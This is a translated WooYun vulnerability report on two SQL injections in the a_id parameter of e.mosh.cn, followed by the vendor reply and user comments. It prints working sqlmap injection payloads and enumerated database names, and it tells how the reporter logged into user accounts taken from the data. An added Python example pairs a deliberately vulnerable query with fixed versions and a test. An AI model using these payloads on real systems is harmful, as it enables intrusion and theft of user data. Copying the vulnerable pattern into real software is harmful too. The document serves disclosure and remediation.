
Vulnerability summary

Defect ID: wooyun-2014-053162

Title: Two SQL injections on a website under 活动时 put nearly a million users' personal and billing records at risk

Vendor: mosh.cn

Author: Mr .LZH

Submitted: 2014-03-09 09:52

Fixed: 2014-04-23 09:53

Published: 2014-04-23 09:53

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure timeline:

2014-03-09: Details sent to the vendor, awaiting vendor handling
2014-03-10: Vendor confirmed; details disclosed to the vendor only
2014-03-20: Details disclosed to core white hats and domain experts
2014-03-30: Details disclosed to regular white hats
2014-04-09: Details disclosed to intern white hats
2014-04-23: Details disclosed to the public

Summary:

SQL injection on a website under 活动时

Details:

Vulnerable URL 1: http://e.mosh.cn/contectus/getContent?a_id=4
Vulnerable URL 2: http://e.mosh.cn/god/getcontent?a_id=62

---
Place: GET
Parameter: a_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: a_id=4 AND 4566=4566
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: a_id=-3600 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,107,119,122,58),CHAR(78,86,111,105,72,119,72,102,73,120),CHAR(58,105,107,108,58)), NULL, NULL, NULL, NULL, NULL#
---
available databases [8]:
[*] furniture_show
[*] information_schema
[*] mosh
[*] mosh_model
[*] mosh_stat
[*] mosh_tuan
[*] newmosh
[*] test
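Both URLs share one root cause: the `a_id` query-string value is spliced into the SQL text, which is why sqlmap's `4 AND 4566=4566` / `4 AND 4566=4567` pair behaves as a true/false oracle and a negative id followed by `UNION ALL SELECT` returns attacker-chosen columns. The following is an added example, not code from the report or from mosh.cn: the vulnerable pattern in Python/sqlite3 beside a parameter-bound version and a type-checked version, plus a regression check a defender can keep in the test suite to confirm the oracle is gone (the `content` table, its rows and all function names are constructed).

```python
import sqlite3

# Constructed stand-in for the site's content table; the real schema is not on the page.
ROWS = [(4, "contact page"), (62, "content 62")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE content (a_id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO content VALUES (?, ?)", ROWS)
    return conn


def get_content_vulnerable(conn, a_id):
    # The pattern behind the report: the raw query-string value becomes part of the
    # statement, so "4 AND 4566=4566" or "-3600 UNION ALL SELECT ..." is parsed as SQL.
    sql = f"SELECT title FROM content WHERE a_id={a_id}"
    return [row[0] for row in conn.execute(sql)]


def get_content_bound(conn, a_id):
    # Parameter binding alone: the value travels as a literal and is never parsed as SQL.
    # A payload string matches no integer a_id, so the lookup simply returns nothing.
    sql = "SELECT title FROM content WHERE a_id=?"
    return [row[0] for row in conn.execute(sql, (a_id,))]


def get_content_fixed(conn, a_id):
    # Defence in depth: reject anything that is not a plain decimal integer before it
    # reaches the database, then bind the typed value.
    if not isinstance(a_id, str) or not a_id.isdigit():
        raise ValueError("a_id must be a decimal integer")
    return get_content_bound(conn, int(a_id))


def boolean_oracle_works(fetch):
    # Regression check: True when `fetch` leaks a boolean oracle through a_id, i.e.
    # "4 AND 4566=4566" behaves exactly like "4" while "4 AND 4566=4567" returns nothing.
    conn = make_db()
    try:
        true_case = fetch(conn, "4 AND 4566=4566")
        false_case = fetch(conn, "4 AND 4566=4567")
    except ValueError:
        return False  # input rejected outright: no oracle
    return true_case == fetch(conn, "4") and false_case == []
```

Wire `boolean_oracle_works` against every handler that takes an id from the request; it must return False for all of them after the fix.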

Proof:

Total number of users in the newmosh database:

[Screenshot: QQ截图20140309001143.png]


Logging in with records 2 and 3 from the top:

[Screenshot: QQ截图20140309002057.png]


[Screenshot: QQ截图20140309002204.png]


The data is shown only as proof; I did not retrieve user information in bulk.
The mosh database holds over 600,000 records, probably an old database; I believe the other databases hold more user information as well.
mosh_tuan contains a large amount of billing information, which I am not posting.

Fix recommendation:

Fix it properly and work hard.

Copyright: please credit Mr .LZH@乌云 when reposting


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2014-03-10 09:29

Vendor reply:

Yes, we will definitely work hard and fix it properly. Thank you very much!

Latest status:

None yet


Vulnerability evaluation:

Comments

  1. 2014-03-10 11:18 | Mr .LZH ( Regular white hat | Rank:583 Vulnerabilities:75 | Not a girl? Don't bother me··· )

    WooYun processed it as a small vendor, so although I got 18 rank I actually only got 4 rank, sob, heartbroken, I got almost nothing.

  2. 2014-04-28 18:33 | 小人物Reno ( Regular white hat | Rank:471 Vulnerabilities:110 | X )

    @Mr .LZH Same here, WooYun is such a rip-off!!